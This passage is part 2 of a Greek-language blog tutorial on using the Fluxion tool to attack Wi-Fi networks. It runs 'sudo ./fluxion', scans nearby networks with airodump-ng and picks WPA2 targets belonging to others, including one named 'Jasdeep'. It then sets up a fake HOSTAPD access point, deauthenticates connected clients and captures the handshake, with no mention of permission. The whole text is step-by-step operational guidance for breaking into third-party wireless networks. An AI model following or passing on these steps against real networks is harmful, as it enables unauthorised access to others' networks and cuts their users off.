Είχαμε μείνει στο βήμα 5 όπου με την εντολή “sudo ./fluxion” τρέχαμε το εργαλείο μας, όποτε συνεχίζουμε απο εκει.

Βήμα 6
Αφού εκτελέσετε το Fluxion πληκτρολογώντας αυτήν την εντολή “sudo ./fluxion”, το πρώτο βήμα είναι να επιλέξετε τη γλώσσα.
Επί του παρόντος, το Fluxion υποστηρίζει 6 γλώσσες, δηλαδή γερμανικά, αγγλικά, ρουμανικά, τουρκικά, ισπανικά και κινέζικα.
Για να επιλέξετε Αγγλική Γλώσσα, απλώς πληκτρολογήστε τον αριθμό “2”.

Βήμα 7
Αφού επιλέξετε γλώσσα, το επόμενο βήμα είναι επιλέξετε κάποιον προσαρμογέα wifi (wifi adapter) αν σας κλείσει αυτόματα σημαίνει ότι δεν έχει εντοπίσει κάποιον.

Στην παρακάτω οθόνη, όπως μπορείτε να δείτε, εμφανίζει “wlan0” επειδή χρησιμοποιούμε έναν ασύρματο προσαρμογέα USB της TP-Link Company 150MBPS.
Για να επιλέξετε αυτον που θέλετε, απλώς πληκτρολογήστε τον αριθμό “1”.
Αν έχετε 2-3 μπορείτε να επιλέξετε αυτον που θέλετε με τον ανάλογο αριθμό.

Βήμα 8
Υπάρχουν περίπου 13 κανάλια σε ένα ασύρματο δίκτυο, εμεις τα θέλουμε όλα.
Οπότε επιλέγουμε το 1.

Σε αυτή τη φάση, θα τρέξει αυτόματα στο background ενα airodump-ng script

Βήμα 9
Όπως μπορείτε να δείτε, δείχνει περίπου 9 ασύρματα δίκτυα από τα οποία 7 δίκτυα χρησιμοποιούν ασφάλεια WPA2-PSK και 2 χρησιμοποιούν WPA.

Εάν θέλετε να κάνετε ξανά σάρωση, απλώς πληκτρολογήστε “r” και πατήστε enter.
Επομένως, σε αυτήν την περίπτωση, επιλέγουμε το ασύρματο δίκτυο στον αριθμό “9” επειδή αυτο με ενδιαφέρει εμένα.
Εσείς μποιρείτε να επιλέξετε όποιο θέλετε.

10)
Στην επόμενη οθόνη, θα εμφανιστούν πλήρεις λεπτομέρειες σχετικά με αυτό το δίκτυο, όπως Όνομα SSID, Αριθμός Καναλιού, Ταχύτητα κλπ.
Και παρακάτω μπορείτε να επιλέξετε οποιαδήποτε μέθοδο επίθεσης θέλετε να κάνετε στο δίκτυο αυτο, αλλά ο προτεινόμενος τρόπος είναι να χρησιμοποιήσετε το HOSTAPD.
Δηλαδή την πρώτη επιλογή και πατάμε 1.

Και στην επομενη οθονη πατάμε Enter

Και μετα το 1 και παλι την πρωτη επιλογή

11)
Στην φωτογραφία παρακάτω, μπορείτε εύκολα να δείτε δύο ακόμη 2 παράθυρα να έχουν ανοίξει.
στην επάνω όπου θα λάβετε το σήμα  στη δεξιά πλευρά και στην κάτω οθόνη, συνεχίζεται μια δραστηριότητα κατάργησης ταυτότητας.
Μόλις λάβετε τη χειραψία στην πρώτη οθόνη, τερματίστε την εντολή κατάργησης ταυτότητας, διαφορετικά μπορεί να δημιουργήσει πρόβλημα στο τέλος.

Σε αυτήν την περίπτωση, το Δίκτυο “Jasdeep” που στοχεύουμε μπορεί να μην έχει ενεργούς clients, οπότε ας δοκιμάσουμε με κάποιο άλλο δίκτυο πατώντας τον αριθμό “3”.

Τώρα αυτή τη φορά επιλέγω τον αριθμό “8” δηλαδή το δίκτυο που ειναι σε αυτο το νούμερο, γιατί δείχνει ξεκάθαρα ότι έχει μερικούς ενεργούς πελάτες, οπότε υπάρχουν περισσότερες πιθανότητες
Επαναλάβετε τα ίδια βήματα.

Βλέπουμε εδώ πήραμε κανονικά ότι θέλαμε, Πατήστε το συνδυασμό πλήκτρων CTRL+C και στις δύο επάνω οθόνες και προχωρήστε με τον αριθμό “1” “Check Handshake”.

Ακολουθεί part 3

Related posts:

Ιδεολογία Hacking Διαφορές Hacker με Cracker Γιατί η αγορά ενός crypter μπορεί να αποβεί άχρηστη ? Δωρεάν Verification χωρίς πραγματικό αριθμό τηλεφώνου.